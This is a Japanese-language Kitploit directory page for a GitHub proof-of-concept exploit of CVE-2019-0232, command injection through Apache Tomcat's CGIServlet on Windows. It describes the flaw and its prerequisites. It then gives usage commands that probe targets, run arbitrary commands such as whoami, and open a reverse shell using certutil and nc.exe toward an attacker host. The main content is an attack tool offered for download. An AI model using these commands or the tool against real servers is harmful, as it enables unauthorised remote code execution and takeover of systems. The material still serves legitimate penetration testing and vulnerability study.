Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
ツール/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

リポジトリを見る
1121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Windows バッチスクリプトインジェクション(クエリ文字列引数経由)

説明

Apache Tomcat で CGI サーブレットが有効かつ enableCmdLineArguments=true の場合、クエリ文字列パラメータをコマンドライン引数として CGI スクリプトに渡します。Windows では、バッチファイル (.bat/.cmd) は & をコマンド区切り文字として解釈するため、細工された URL を介して任意のコマンド実行が可能になります。

前提条件

  • CGI サーブレットが conf/web.xml または WEB-INF/web.xml で有効化されている
  • CGI サーブレットの init-params に enableCmdLineArguments=true が設定されている
  • CGI スクリプト(例: ism.bat)がデプロイされアクセス可能である
  • Windows ターゲット(& インジェクションにはバッチファイルが必要)

使用方法

root@kitploit:~
git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

CGI エンドポイントが存在するか確認:

root@kitploit:~
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

コマンドを実行:

root@kitploit:~
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

リバースシェル(2段階 certutil + nc.exe):

root@kitploit:~
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

要件

  • Python 3.8+
  • requests
  • Windows ターゲット(脆弱性はOS固有)
ツールをダウンロード